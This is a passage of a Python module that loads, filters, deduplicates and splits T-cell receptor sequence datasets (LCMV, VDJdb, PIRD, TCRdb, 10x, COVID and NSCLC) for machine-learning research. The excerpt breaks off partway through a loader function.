assert num_train + num_valid + num_test == len(
indices
), f"Got mismatched counts: {num_train} + {num_valid} + {num_test} != {len(indices)}"
indices_train = indices[:num_train]
indices_valid = indices[num_train : num_train + num_valid]
    indices_test = indices[num_train + num_valid :]  # avoids indices[-0:] returning the whole array when num_test == 0
assert indices_train.size + indices_valid.size + indices_test.size == len(idx)
return indices_train, indices_valid, indices_test
def split_arr(
arr: Union[np.ndarray, pd.DataFrame, list, tuple],
split: Literal["train", "valid", "test"],
**kwargs,
) -> Union[np.ndarray, pd.DataFrame, list]:
"""
Randomly split the array into the given split
kwargs are fed to shuffle_indices_train_valid_test
"""
split_to_idx = {"train": 0, "valid": 1, "test": 2}
assert split in split_to_idx, f"Unrecognized split: {split}"
n = len(arr) if isinstance(arr, (list, tuple)) else arr.shape[0]
indices = np.arange(n)
keep_idx = shuffle_indices_train_valid_test(indices, **kwargs)[split_to_idx[split]]
if isinstance(arr, pd.DataFrame):
return arr.iloc[keep_idx]
if isinstance(arr, (list, tuple)):
return [arr[i] for i in keep_idx]
return arr[keep_idx]
def sample_unlabelled_tcrdb_trb(
n: int, blacklist: Optional[Collection[str]] = None, seed: int = 6464
) -> List[str]:
"""
Convenience function to sample the given number of TRBs from TCRdb
Blacklist can be given to exclude certain sequences from sampling
The following tests ensure reproducibility
>>> all([a == b for a, b in zip(sample_unlabelled_tcrdb_trb(10), sample_unlabelled_tcrdb_trb(10))])
True
"""
tcrdb = load_tcrdb()
rng = np.random.default_rng(seed=seed)
if blacklist is None:
# Maintain separate code paths for back compatibility
idx = rng.choice(np.arange(len(tcrdb)), size=n, replace=False)
else:
# Removing whitespace has no effect if there was no whitespace to start
blacklist_set = set([ft.remove_whitespace(b) for b in blacklist])
# Oversample in case of overlap with blacklist
idx = rng.choice(np.arange(len(tcrdb)), size=n + len(blacklist), replace=False)
# Filter out blacklist overlaps and take the first n
idx = [i for i in idx if tcrdb.iloc[i]["AASeq"] not in blacklist_set][:n]
assert len(idx) == n
retval = [tcrdb.iloc[i]["AASeq"] for i in idx]
    if blacklist:
        # Sanity check: sampled sequences should not overlap the blacklist
        assert not set(retval).intersection(blacklist)
return retval
def load_lcmv_vdj(
vdj_fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_tcr_vdj_unsplit.txt.gz")
) -> Dict[str, Dict[str, Dict[str, Tuple[str, str, str]]]]:
"""
Load the vdj table and return it in a 3-level dictionary
identifier -> TRA/TRB -> cdr3 sequence -> (v, d, j)
{
tcr_cdr3s_aa_identifier : {
"TRA": {
cdr3_sequence: (v, d, j),
...
}
"TRB": ...
}
}
    v, d, or j may be None if not provided
"""
check_none: Callable[
[str], Union[str, None]
] = lambda x: None if x.lower() == "none" or not x else x
df = pd.read_csv(vdj_fname, delimiter="\t", low_memory=False)
retval = collections.defaultdict(lambda: {"TRA": dict(), "TRB": dict()})
for i, row in df.iterrows():
k = row["tcr_cdr3s_aa"]
retval[k][row["chain"]][row["cdr3"]] = (
check_none(row["v_gene"]),
check_none(row["d_gene"]),
check_none(row["j_gene"]),
)
return retval
@functools.lru_cache(maxsize=16)
def load_lcmv_table(
fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_tetramer_tcr.txt"),
metadata_fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_all_metadata.txt.gz"),
vdj_fname: str = os.path.join(LOCAL_DATA_DIR, "lcmv_tcr_vdj_unsplit.txt.gz"),
drop_na: bool = True,
drop_unsorted: bool = True,
) -> pd.DataFrame:
"""Load the LCMV data table"""
table = pd.read_csv(fname, delimiter="\t")
logging.info(f"Loaded in table of {len(table)} entries")
if drop_na:
table.dropna(axis=0, how="any", subset=["tetramer", "TRB", "TRA"], inplace=True)
logging.info(f"{len(table)} entries remain after dropping na")
if drop_unsorted:
drop_idx = table.index[table["tetramer"] == "Unsorted"]
table.drop(index=drop_idx, inplace=True)
logging.info(f"{len(table)} entries remain after dropping unsorted")
    # Take entries with multiple TRA or TRB sequences and split them, carrying over
# all of the other metadata to each row
dedup_rows = []
for _i, row in table.iterrows():
# For this row, determine nucleotide sequences
tcr_nt = collect_tra_trb(row["tcr_cdr3s_nt"])
# The nucleotide and the protein sequences should match up correctly
tcr_aa_combos = list(
itertools.product(row["TRA"].split(";"), row["TRB"].split(";"))
)
tcr_nt_combos = list(itertools.product(tcr_nt["TRA"], tcr_nt["TRB"]))
assert len(tcr_aa_combos) == len(tcr_nt_combos)
for ((tra_aa, trb_aa), (tra_nt, trb_nt)) in zip(tcr_aa_combos, tcr_nt_combos):
new_row = row.copy(deep=True)
# Check that nucleotide and protein sequences match up
assert utils.nt2aa(tra_nt) == tra_aa
assert utils.nt2aa(trb_nt) == trb_aa
new_row["TRA"] = tra_aa
new_row["TRB"] = trb_aa
new_row["TRA_nt"] = tra_nt
new_row["TRB_nt"] = trb_nt
dedup_rows.append(new_row)
dedup_table = pd.DataFrame(dedup_rows)
logging.info(f"{len(dedup_table)} entries after expanding multiple entries")
gp33_antigen = utils.read_newline_file(
os.path.join(os.path.dirname(fname), "lcmv_antigen.txt")
).pop()
dedup_table["antigen.sequence"] = gp33_antigen # gp33 tetramer
# Load metadata and match it up with prior table
metadata_df = pd.read_csv(metadata_fname, delimiter="\t", low_memory=False)
if drop_na:
metadata_df.dropna(axis=0, how="any", subset=["TRA", "TRB"], inplace=True)
table_ab_pairs = list(dedup_table["tcr_cdr3s_aa"])
metadata_ab_pairs = list(metadata_df["tcr_cdr3s_aa"])
idx_map = np.array([metadata_ab_pairs.index(p) for p in table_ab_pairs])
metadata_df_reorder = metadata_df.iloc[idx_map]
assert (
all(
[
i == j
for i, j in zip(
metadata_df_reorder["tcr_cdr3s_aa"], dedup_table["tcr_cdr3s_aa"]
)
]
)
and metadata_df_reorder.shape[0] == dedup_table.shape[0]
)
metadata_df_reorder = metadata_df_reorder.drop(
columns=[
col for col in metadata_df_reorder.columns if col in dedup_table.columns
]
)
metadata_df_reorder.index = dedup_table.index
# Load in VDJ annotations and match it up with prior table
vdj_mapping = load_lcmv_vdj(vdj_fname) # 3 layer dict
vdj_df_reorder_rows = []
for i, row in dedup_table.iterrows():
b_vdj = vdj_mapping[row["tcr_cdr3s_aa"]]["TRB"][row["TRB"]]
a_vdj = vdj_mapping[row["tcr_cdr3s_aa"]]["TRA"][row["TRA"]]
s = pd.Series(
[row["tcr_cdr3s_aa"], *a_vdj, *b_vdj],
index=[
"tcr_cdr3s_aa",
"v_a_gene",
"d_a_gene",
"j_a_gene",
"v_b_gene",
"d_b_gene",
"j_b_gene",
],
)
vdj_df_reorder_rows.append(s)
vdj_df_reorder = pd.DataFrame(vdj_df_reorder_rows)
assert all(
[
i == j
for i, j in zip(vdj_df_reorder["tcr_cdr3s_aa"], dedup_table["tcr_cdr3s_aa"])
]
)
vdj_df_drop_cols = [
col
for col in vdj_df_reorder.columns
if col in dedup_table.columns or col in metadata_df_reorder.columns
]
logging.debug(f"Dropping cols from VDJ info: {vdj_df_drop_cols}")
vdj_df_reorder = vdj_df_reorder.drop(columns=vdj_df_drop_cols)
vdj_df_reorder.index = dedup_table.index
retval = pd.concat([dedup_table, metadata_df_reorder, vdj_df_reorder], axis=1)
# Check that the TRA/TRB are the same as the "dedup_table" object that we were previously returning
assert all([i == j for i, j in zip(retval["TRA"], dedup_table["TRA"])])
assert all([i == j for i, j in zip(retval["TRB"], dedup_table["TRB"])])
# Report basic metadata
cnt = collections.Counter(dedup_table["tetramer"])
for k, v in cnt.items():
logging.info(f"Class {k}: {v}")
return retval
def dedup_lcmv_table(
lcmv_tab: pd.DataFrame,
blacklist_label_combos: Sequence[str] = (
"TetMid,TetNeg",
"TetNeg,TetPos",
"TetMid,TetNeg,TetPos",
),
return_mode: Literal["nt", "aa", "full"] = "aa",
) -> Tuple[Union[List[Tuple[str, str]], pd.DataFrame], List[str]]:
"""
Return TRA and TRB pairs that are deduped according to their AA sequence and removes
pairs with ambiguous labels
This was implemented to centrally solve the issue where the LCMV table had duplicate rows and
a few cases of ambiguous labels
Returns two items of equal length:
- List of (TRA, TRB) pairs either in AA form or NT form, or a subset of the full dataframe
- List of corresponding labels (may be merged)
"""
lcmv_ab = ["|".join(p) for p in zip(lcmv_tab["TRA"], lcmv_tab["TRB"])]
# Create a mapping from amino acid to NT sequence
lcmv_ab_to_nt = {
n: "|".join(p)
for n, p in zip(lcmv_ab, zip(lcmv_tab["TRA_nt"], lcmv_tab["TRB_nt"]))
}
lcmv_ab_to_full = {
"|".join([row["TRA"], row["TRB"]]): row for i, row in lcmv_tab.iterrows()
}
lcmv_ab_dedup, lcmv_labels_dedup = dedup_and_merge_labels(
lcmv_ab, list(lcmv_tab["tetramer"])
)
all_label_counter = collections.Counter(lcmv_labels_dedup)
logging.info(f"Combined labels {all_label_counter.most_common()}")
logging.info(f"Filtering out labels {blacklist_label_combos}")
good_label_idx = [
i for i, l in enumerate(lcmv_labels_dedup) if l not in blacklist_label_combos
]
logging.info(f"Retaining {len(good_label_idx)} pairs with unambiguous labels")
lcmv_ab_good = [lcmv_ab_dedup[i] for i in good_label_idx]
lcmv_labels_good = [lcmv_labels_dedup[i] for i in good_label_idx]
assert len(lcmv_ab_good) == len(lcmv_labels_good) == len(good_label_idx)
label_counter = collections.Counter(lcmv_labels_good)
logging.info(f"LCMV deduped labels: {label_counter.most_common()}")
# Resplit into pairs
if return_mode == "nt":
lcmv_ab_good_split = [tuple(lcmv_ab_to_nt[p].split("|")) for p in lcmv_ab_good]
elif return_mode == "aa":
lcmv_ab_good_split = [tuple(p.split("|")) for p in lcmv_ab_good]
elif return_mode == "full":
lcmv_ab_good_split = pd.DataFrame([lcmv_ab_to_full[p] for p in lcmv_ab_good])
else:
raise ValueError(f"Unrecognized return mode: {return_mode}")
return lcmv_ab_good_split, lcmv_labels_good
def dedup_lcmv_table_trb_only(
lcmv_tab: pd.DataFrame,
blacklist_label_combos: Sequence[str] = (
"TetMid,TetNeg",
"TetNeg,TetPos",
"TetMid,TetNeg,TetPos",
),
) -> Tuple[List[str], List[str]]:
"""
Return a list of unique TRBs and corresponding set of labels
"""
trb_dedup, labels_dedup = dedup_and_merge_labels(
list(lcmv_tab["TRB"]), list(lcmv_tab["tetramer"])
)
assert utils.is_all_unique(trb_dedup)
all_label_counter = collections.Counter(labels_dedup)
logging.info(f"Combined labels {all_label_counter.most_common()}")
logging.info(f"Filtering out labels {blacklist_label_combos}")
good_label_idx = [
i for i, l in enumerate(labels_dedup) if l not in blacklist_label_combos
]
logging.info(f"Retaining {len(good_label_idx)} sequences with unambiguous labels")
trb_good = [trb_dedup[i] for i in good_label_idx]
labels_good = [labels_dedup[i] for i in good_label_idx]
assert len(trb_good) == len(labels_good) == len(good_label_idx)
label_counter = collections.Counter(labels_good)
logging.info(f"LCMV TRB only deduped labels: {label_counter.most_common()}")
return trb_good, labels_good
def load_vdjdb(
fname: str = os.path.join(LOCAL_DATA_DIR, "vdjdb-2021-02-02", "vdjdb.slim.txt"),
species_filter: Optional[Iterable[str]] = ["MusMusculus", "HomoSapiens"],
tra_trb_filter: Optional[Iterable[str]] = ["TRA", "TRB"],
addtl_filters: Optional[Dict[str, Iterable[str]]] = None,
drop_null: bool = True,
vocab_check: bool = True,
) -> pd.DataFrame:
"""
Load VDJdb as a dataframe. 'cdr3' column is the column containing sequences
~62k examples, spanning 352 distinct antigens
Additional filters can be provided in the format
{column_name: ['acceptableValue1', 'acceptableValue2', ...]}
"""
df = pd.read_csv(fname, sep="\t")
if species_filter is not None:
logging.info(f"Filtering VDJdb species to: {species_filter}")
keep_idx = [i for i in df.index if df.loc[i, "species"] in species_filter]
df = df.loc[keep_idx]
logging.info(f"Species distribution: {collections.Counter(df['species'])}")
if drop_null:
keep_idx = [~pd.isnull(aa) for aa in df["cdr3"]]
logging.info(
f"VDJdb: dropping {np.sum(keep_idx==False)} entries for null cdr3 sequence"
)
df = df.iloc[np.where(keep_idx)]
if vocab_check:
pass_idx = np.array([ft.adheres_to_vocab(aa) for aa in df["cdr3"]])
logging.info(
f"VDJdb: dropping {np.sum(pass_idx==False)} entries for unrecognized AAs"
)
df = df.iloc[np.where(pass_idx)]
nonnull_antigens_df = df.loc[~pd.isnull(df["antigen.epitope"])]
logging.info(
f"Entries with antigen sequence: {nonnull_antigens_df.shape[0]}/{df.shape[0]}"
)
logging.info(
f"Unique antigen sequences: {len(set(nonnull_antigens_df['antigen.epitope']))}"
)
if tra_trb_filter is not None:
logging.info(f"Filtering TRA/TRB to: {tra_trb_filter}")
keep_idx = [i for i in df.index if df.loc[i, "gene"] in tra_trb_filter]
df = df.loc[keep_idx]
    # For each of the additional filters
if addtl_filters is not None:
for colname, keep_vals in addtl_filters.items():
logging.info(f"Filtering {colname} to {keep_vals}")
keep_idx = [i for i in df.index if df.loc[i, colname] in keep_vals]
df = df.loc[keep_idx]
ab_counter = collections.Counter(df["gene"])
logging.info(f"TRA: {ab_counter['TRA']} | TRB: {ab_counter['TRB']}")
return df
def load_pird(
fname: str = os.path.join(LOCAL_DATA_DIR, "pird", "pird_tcr_ab.csv"),
tra_trb_only: bool = True,
vocab_check: bool = True,
addtl_filters: Optional[Dict[str, Iterable[str]]] = None,
with_antigen_only: bool = False,
) -> pd.DataFrame:
"""
Load PIRD (pan immune repertoire database) TCR A/B data
https://db.cngb.org/pird/tbadb/
For TRA we want the column CDR3.alpha.aa
For TRB we want the column CDR3.beta.aa
The PIRD dataset also has ~8k examples with antigens (73 unique)
"""
if not tra_trb_only:
raise NotImplementedError
df = pd.read_csv(fname, na_values="-", low_memory=False)
# df_orig = pd.read_csv(fname, na_values="-", low_memory=False)
# df = df_orig.dropna(axis=0, how="all", subset=["CDR3.alpha.aa", "CDR3.beta.aa"])
# logging.info(
# f"Dropped {len(df_orig) - len(df)} entires with null sequence in both TRA/TRB"
# )
antigen_null_rate = np.sum(pd.isnull(df["Antigen.sequence"])) / df.shape[0]
logging.info(
f"PIRD data {1.0 - antigen_null_rate:.4f} data labelled with antigen sequence"
)
# Filter out entries that have weird characters in their aa sequences
if vocab_check:
tra_pass = [
pd.isnull(aa) or ft.adheres_to_vocab(aa) for aa in df["CDR3.alpha.aa"]
]
trb_pass = [
pd.isnull(aa) or ft.adheres_to_vocab(aa) for aa in df["CDR3.beta.aa"]
]
both_pass = np.logical_and(tra_pass, trb_pass)
logging.info(
f"PIRD: Removing {np.sum(both_pass == False)} entires with non amino acid residues"
)
df = df.iloc[np.where(both_pass)]
# Collect instances where we have antigen information
nonnull_antigens_df = df.loc[~pd.isnull(df["Antigen.sequence"])]
nonnull_antigens = nonnull_antigens_df["Antigen.sequence"]
logging.info(
f"Entries with antigen sequence: {len(nonnull_antigens)}/{df.shape[0]}"
)
logging.info(f"Unique antigen sequences: {len(set(nonnull_antigens))}")
logging.info(f"PIRD data TRA/TRB instances: {collections.Counter(df['Locus'])}")
retval = nonnull_antigens_df if with_antigen_only else df
# Perform additional filtering
if addtl_filters is not None:
for colname, keep_vals in addtl_filters.items():
logging.info(f"Filtering {colname} to {keep_vals}")
keep_idx = [i for i in retval.index if retval.loc[i, colname] in keep_vals]
retval = retval.loc[keep_idx]
# Report metrics
# print(df.loc[:, ["CDR3.alpha.aa", "CDR3.beta.aa"]])
has_tra = ~pd.isnull(df["CDR3.alpha.aa"])
has_trb = ~pd.isnull(df["CDR3.beta.aa"])
has_both = np.logical_and(has_tra, has_trb)
logging.info(f"PIRD entries with TRB sequence: {np.sum(has_tra)}")
logging.info(f"PIRD entries with TRB sequence: {np.sum(has_trb)}")
logging.info(f"PIRD entries with TRA and TRB: {np.sum(has_both)}")
# print(retval.iloc[np.where(has_both)[0]].loc[:, ["CDR3.alpha.aa", "CDR3.beta.aa"]])
return retval
def _tcrdb_df_to_entries(fname: str) -> List[tuple]:
"""Helper function for processing TCRdb tables"""
def tra_trb_from_str(s: str) -> str:
if s.startswith("TRA"):
return "TRA"
elif s.startswith("TRB"):
return "TRB"
return "UNK"
def infer_row_tra_trb(row) -> str:
"""Takes in a row from itertuples and return inferred TRA/TRB"""
infers = []
if "Vregion" in row._fields:
infers.append(tra_trb_from_str(row.Vregion))
if "Dregion" in row._fields:
infers.append(tra_trb_from_str(row.Dregion))
if "Jregion" in row._fields:
infers.append(tra_trb_from_str(row.Jregion))
if len(infers) == 0:
return "UNK"
# Use majority voting
cnt = collections.Counter(infers)
        consensus, consensus_count = cnt.most_common(1).pop()
        if consensus_count / len(infers) > 0.5:
return consensus
return "UNK" # No majority
acc = os.path.basename(fname).split(".")[0]
df = pd.read_csv(fname, delimiter="\t")
entries = [
(acc, row.RunId, row.AASeq, row.cloneFraction, infer_row_tra_trb(row))
for row in df.itertuples(index=False)
]
return entries
@functools.lru_cache()
def load_tcrdb(
dirname: str = os.path.join(LOCAL_DATA_DIR, "tcrdb"),
drop_unk: bool = True,
vocab_check: bool = True,
) -> pd.DataFrame:
"""
Load TCRdb
https://academic.oup.com/nar/article/49/D1/D468/5912818
http://bioinfo.life.hust.edu.cn/TCRdb/#/
"""
accessions_list_fname = os.path.join(dirname, "tcrdb_accessions_21_03_22.txt")
with open(accessions_list_fname, "r") as source:
accessions = [line.strip() for line in source if not line.startswith("#")]
# Load in each accession
accession_fnames = [os.path.join(dirname, f"{acc}.tsv.gz") for acc in accessions]
pool = multiprocessing.Pool(8)
entries = pool.map(_tcrdb_df_to_entries, accession_fnames)
pool.close()
pool.join()
retval = pd.DataFrame(
itertools.chain.from_iterable(entries),
columns=["accession", "RunId", "AASeq", "cloneFraction", "tra_trb"],
)
if drop_unk:
drop_idx = np.where(retval["tra_trb"] == "UNK")[0]
logging.info(
f"Dropping {len(drop_idx)} TCRdb entries for unknown TRA TRB status"
)
retval.drop(index=drop_idx, inplace=True)
if vocab_check:
is_valid_aa = np.array([ft.adheres_to_vocab(aa) for aa in retval["AASeq"]])
logging.info(
f"TCRdb: Removing {np.sum(is_valid_aa == False)} entries with non-amino acid residues"
)
retval = retval.iloc[np.where(is_valid_aa)]
return retval
def collect_tra_trb(s: str) -> Dict[str, List[str]]:
"""
Given semicolon separated TRA/TRB listings in a string, separate them and return a mapping
If either TRA/TRB is missing, corresponding return will be a list with a single empty string
>>> collect_tra_trb("TRA:foo;TRA:baz;TRB:bar")
{'TRA': ['foo', 'baz'], 'TRB': ['bar']}
>>> collect_tra_trb("TRB:bar")
{'TRA': [''], 'TRB': ['bar']}
>>> collect_tra_trb("TRB:bar;TRA:foo")
{'TRA': ['foo'], 'TRB': ['bar']}
"""
retval = {"TRA": [], "TRB": []}
for part in s.split(";"):
k, v = part.split(":")
retval[k].append(v)
# Return empty strings if TRA/TRB are not found
if not retval["TRA"]:
retval["TRA"].append("")
if not retval["TRB"]:
retval["TRB"].append("")
return retval
def dedup_and_merge_labels(
sequences: Sequence[str], labels: Sequence[str], sep: str = ","
) -> Tuple[List[str], List[str]]:
"""
Remove duplicates in sequences and merge labels accordingly
sep is the label separator, used to split and rejoin labels
Return is sorted!
>>> dedup_and_merge_labels(['a', 'b', 'a'], ['x', 'y', 'y'])
(['a', 'b'], ['x,y', 'y'])
>>> dedup_and_merge_labels(['a', 'b', 'a', 'a'], ['x', 'y', 'y,x', 'z'])
(['a', 'b'], ['x,y,z', 'y'])
>>> dedup_and_merge_labels(['a', 'b', 'd', 'c'], ['x', 'z', 'y', 'n'])
(['a', 'b', 'c', 'd'], ['x', 'z', 'n', 'y'])
"""
# unique returns the *sorted* unique elements of an array
uniq_sequences, inverse_idx, uniq_seq_counts = np.unique(
sequences, return_inverse=True, return_counts=True
)
uniq_labels, agg_count = [], 0
# Walk through all unique sequences and fetch/merge corresponding labels
for i, (seq, c) in enumerate(zip(uniq_sequences, uniq_seq_counts)):
orig_idx = np.where(inverse_idx == i)[0]
match_labels = utils.dedup([labels[i] for i in orig_idx])
if len(match_labels) == 1:
uniq_labels.append(match_labels.pop())
else: # Aggregate labels
aggregated_labels = utils.dedup(
list(
itertools.chain.from_iterable([l.split(sep) for l in match_labels])
)
)
logging.debug(f"Merging {match_labels} -> {sep.join(aggregated_labels)}")
agg_count += 1
uniq_labels.append(sep.join(sorted(aggregated_labels)))
assert len(uniq_sequences) == len(uniq_labels)
logging.info(
f"Deduped from {len(sequences)} -> {len(uniq_sequences)} merging {agg_count} labels"
)
return list(uniq_sequences), uniq_labels
def load_clonotypes_csv_general(fname: str, single_return: bool = True) -> pd.DataFrame:
"""
Load clonotypes.csv file. This file is expected to be a comma-delimited table with columns
"clonotype_id" and "cdr3s_aa".
Returned data frame is the df contained in fname with added columns TRA_aa and TRB_aa
containing amino acid sequences for TRA/TRB, respectively.
single_return = True is default/legacy behavior, where in the event that multiple TRA/TRB
sequences are listed, we take the last listed one from each. Setting this to false returns
a ;-delimited series of TCRs when multiple values are encountered.
"""
# Read file
df = pd.read_csv(fname, index_col=0)
# Expand out the TRA/TRBs
tra_seqs, trb_seqs = [], []
for i, row in df.iterrows():
tra_trb_mapping = collect_tra_trb(row["cdr3s_aa"])
if single_return:
tra_seqs.append(tra_trb_mapping["TRA"][-1])
trb_seqs.append(tra_trb_mapping["TRB"][-1])
else:
tra_seqs.append(";".join(tra_trb_mapping["TRA"]))
trb_seqs.append(";".join(tra_trb_mapping["TRB"]))
df["TRA_aa"] = tra_seqs
df["TRB_aa"] = trb_seqs
return df
def load_10x(
celltype: str = "CD8_healthy", exclude_singles: bool = True
) -> pd.DataFrame:
"""
Load 10x data. Columns of interest are TRA_aa and TRB_aa
"""
def split_to_tra_trb(s: Iterable[str]):
"""Split into two lists of TRA and TRB"""
# TODO this does NOT correctly handle cases where there are say
# multiple TRA sequences in a single row
tra_seqs, trb_seqs = [], []
for entry in s:
sdict = dict([part.split(":") for part in entry.split(";")])
tra = sdict["TRA"] if "TRA" in sdict else ""
trb = sdict["TRB"] if "TRB" in sdict else ""
tra_seqs.append(tra)
trb_seqs.append(trb)
return tra_seqs, trb_seqs
dirname = os.path.join(LOCAL_DATA_DIR, "10x", celltype)
assert os.path.isdir(dirname), f"Unrecognized celltype: {celltype}"
if celltype == "CD8_healthy":
fnames = glob.glob(
os.path.join(dirname, "vdj_v1_hs_aggregated_donor*_clonotypes.csv")
)
else:
fnames = glob.glob(os.path.join(dirname, "*_t_clonotypes.csv"))
assert fnames
fnames = sorted(fnames)
dfs = []
for fname in fnames:
df = pd.read_csv(fname)
tra_seqs, trb_seqs = split_to_tra_trb(df["cdr3s_aa"])
df["TRA_aa"] = tra_seqs
df["TRB_aa"] = trb_seqs
tra_nt, trb_nt = split_to_tra_trb(df["cdr3s_nt"])
df["TRA_nt"] = tra_nt
df["TRB_nt"] = trb_nt
if exclude_singles:
is_single_idx = np.where(
np.logical_or(df["TRA_aa"] == "", df["TRB_aa"] == "")
)
logging.info(
f"Dropping {len(is_single_idx[0])} entries for unmatched TRA/TRB"
)
df.drop(index=is_single_idx[0], inplace=True)
dfs.append(df)
retval = pd.concat(dfs, axis=0)
return retval
def load_glanville() -> pd.DataFrame:
"""Load in the Glanville GLIPH dataset"""
fname = os.path.join(LOCAL_DATA_DIR, "glanville", "glanville_curated.csv")
df = pd.read_csv(fname, low_memory=False, header="infer")
df["CDR3b_spaced"] = [ft.insert_whitespace(aa) for aa in df["CDR3b"]]
return df
def load_bcc(
dirname: str = os.path.join(LOCAL_DATA_DIR, "GSE123813_bcc"),
require_tra: bool = False,
require_trb: bool = False,
) -> pd.DataFrame:
"""
Load the BCC TCR data
Source: https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE123813
"""
# Load in the tables
tcr_table = pd.read_csv(
os.path.join(dirname, "GSE123813_bcc_tcr.txt"), sep="\t", index_col=0,
)
tcr_table.index.name = "cell.id"
metadata_table = pd.read_csv(
os.path.join(dirname, "GSE123813_bcc_tcell_metadata.txt"),
sep="\t",
index_col=0,
)
# Intersect and concatenate
overlapped_idx = [i for i in metadata_table.index if i in tcr_table.index]
table = metadata_table.loc[overlapped_idx]
tcr_table = tcr_table.loc[overlapped_idx]
for col in tcr_table.columns:
table[col] = tcr_table[col]
# Create dedicated columns for TRA and TRB
tra_trb_pairs = []
for item in table["cdr3s_aa"]:
d = {"TRA": "", "TRB": ""} # Null sequences for both
d.update(dict([i.split(":") for i in item.split(";")]))
tra_trb_pairs.append((d["TRA"], d["TRB"]))
tra, trb = zip(*tra_trb_pairs)
table["TRA_aa"] = tra
table["TRB_aa"] = trb
if require_tra:
keep_idx = np.array([i for i, aa in enumerate(table["TRA_aa"]) if aa])
logging.info(
f"BCC: Retaining {len(keep_idx)}/{table.shape[0]} entries with TRA sequence"
)
table = table.iloc[keep_idx]
if require_trb:
keep_idx = np.array([i for i, aa in enumerate(table["TRB_aa"]) if aa])
logging.info(
f"BCC: retaining {len(keep_idx)}/{table.shape[0]} entries with TRB sequence"
)
table = table.iloc[keep_idx]
return table
def load_immuneaccess_mira_covid(
dirname: str = os.path.join(
LOCAL_DATA_DIR, "immuneaccess/ImmuneCODE-MIRA-Release002.1"
),
basename: str = "peptide-detail-ci.csv",
) -> pd.DataFrame:
"""
Load the immuneaccess data
https://clients.adaptivebiotech.com/pub/covid-2020
https://www.researchsquare.com/article/rs-51964/v1
Dataset includes three panels:
minigene_set1, minigene_set2 target large protein sequences
C19_cI targets individual peptides or small groups of peptides
subject-metadata.csv - metadata
orfs.csv - genomic location of MIRA targets as per GenBank11
minigene-hits.csv - counts of number of unique TCRs bound to targets in minigene panels
minigene-detail.csv - describes identity of TCRs bound per target for both minigene panels
peptide-hits.csv - counts of number of unique TCRs bound to targets within C19_cI panel
peptide-detail.csv - describes identity of TCRs bound per target for C19_cI MIRA panel
Formerly used minigene-detail.csv, now use peptide-detail-ci
"""
fname = os.path.join(dirname, basename)
df = pd.read_csv(fname, delimiter=",", low_memory=False)
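    # "TCR BioIdentity" bundles the CDR3 amino-acid sequence with gene annotations,
    # separated by "+"; keep only the leading amino-acid portion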
tcr_seqs = [i.split("+")[0] for i in df["TCR BioIdentity"]]
good_idx = []
for i, seq in enumerate(tcr_seqs):
if ft.adheres_to_vocab(seq):
good_idx.append(i)
else:
logging.debug(f"immuneaccess MIRA: Got anomalous sequence: {seq}")
logging.info(f"Retaining {len(good_idx)}/{len(df)} fully specified TCR sequences")
df = df.iloc[np.array(good_idx)]
df["TCR_aa"] = [i.split("+")[0] for i in df["TCR BioIdentity"]]
# Load in metadata and attach it
metadata_fname = os.path.join(dirname, "subject-metadata.csv")
metadata_df = pd.read_csv(metadata_fname, index_col=0)
df["cohort"] = [metadata_df.loc[e, "Cohort"] for e in df["Experiment"]]
df["celltype"] = [metadata_df.loc[e, "Cell Type"] for e in df["Experiment"]]
df["patient"] = [metadata_df.loc[e, "Subject"] for e in df["Experiment"]]
df["target"] = [metadata_df.loc[e, "Target Type"] for e in df["Experiment"]]
return df
def load_longitudinal_covid_trbs(
dirname: str = os.path.join(LOCAL_DATA_DIR, "covid_longitudinal/beta"),
check_vocab: bool = True,
) -> pd.DataFrame:
"""
Load longitudinal covid data
References:
https://zenodo.org/record/4065547
https://elifesciences.org/articles/63502
"""
filenames = glob.glob(os.path.join(dirname, "*/*_beta.txt.gz"))
dataframes = []
for fname in filenames:
# Parse out metadata from the filename
bname = os.path.basename(fname)
tokens = bname.split(".")[0].split("_")
if len(tokens) != 4:
            logging.warning(f"Could not parse metadata from {bname}, skipping")
continue
patient, timepoint, celltype, tcr_segment = tokens
assert tcr_segment == "beta"
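        # Some filenames list celltype before timepoint; swap when the parsed timepoint is not numeric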
if not utils.is_numeric_scalar(timepoint):
timepoint, celltype = celltype, timepoint
timepoint = int(timepoint)
if celltype in ("F1", "F2"):
celltype = "PBMC_rep1" if celltype == "F1" else "PBMC_rep2"
# Read in the TCRs
df = pd.read_csv(fname, sep="\t", index_col=0)
if check_vocab:
passes_vocab = [ft.adheres_to_vocab(aa) for aa in df["aaSeqCDR3"]]
keep_idx = np.where(passes_vocab)
df = df.iloc[keep_idx]
df["celltype"] = celltype
df["timepoint"] = timepoint
df["patient"] = patient
dataframes.append(df)
# https://stackoverflow.com/questions/41181779/merging-2-dataframes-vertically
retval = pd.concat(dataframes, ignore_index=True)
return retval
def _load_reuben_df_with_label_col(
fname: str, label_col: str, drop_na: bool = True, drop_illegal: bool = True
) -> pd.DataFrame:
"""Helper function for loading in parallel"""
assert os.path.isfile(fname)
df = pd.read_csv(fname, sep="\t", low_memory=False)
df["label"] = label_col
if drop_na:
df.drop(index=df.index[pd.isna(df["aminoAcid"])], inplace=True)
if drop_illegal:
illegal_idx = [
df.index[i]
for i, aa in enumerate(df["aminoAcid"])
if not ft.adheres_to_vocab(aa)
]
df.drop(index=illegal_idx, inplace=True)
return df
def load_reuben_nsclc(
dirname: str = os.path.join(LOCAL_DATA_DIR, "reuben_nsclc")
) -> pd.DataFrame:
"""
Load the TRB sequences for NSCLC tumor and normal
"""
assert os.path.isdir(dirname)
metadata_df = pd.read_csv(
os.path.join(dirname, "SampleOverview_06-29-2021_9-05-38_PM.tsv"),
sep="\t",
index_col=0,
)
metadata_tokens = {
i: utils.dedup([tok.strip() for tok in row["sample_tags"].split(",")])
for i, row in metadata_df.iterrows()
}
    # Find the names that correspond to normal and tumor and their overlap
norm_fnames = [
k for k, v in metadata_tokens.items() if "Normal adjacent tissue" in v
]
tumor_fnames = [k for k, v in metadata_tokens.items() if "Tumor" in v]
assert not set(norm_fnames).intersection(tumor_fnames)
strip_tail_suffix = lambda x: "-".join(x.split("-")[:-1])
norm_prefixes = {strip_tail_suffix(x): x for x in norm_fnames}
assert len(norm_prefixes) == len(norm_fnames)
tumor_prefixes = {strip_tail_suffix(x): x for x in tumor_fnames}
assert len(tumor_prefixes) == len(tumor_fnames)
# Find overlap
shared_prefixes = sorted(
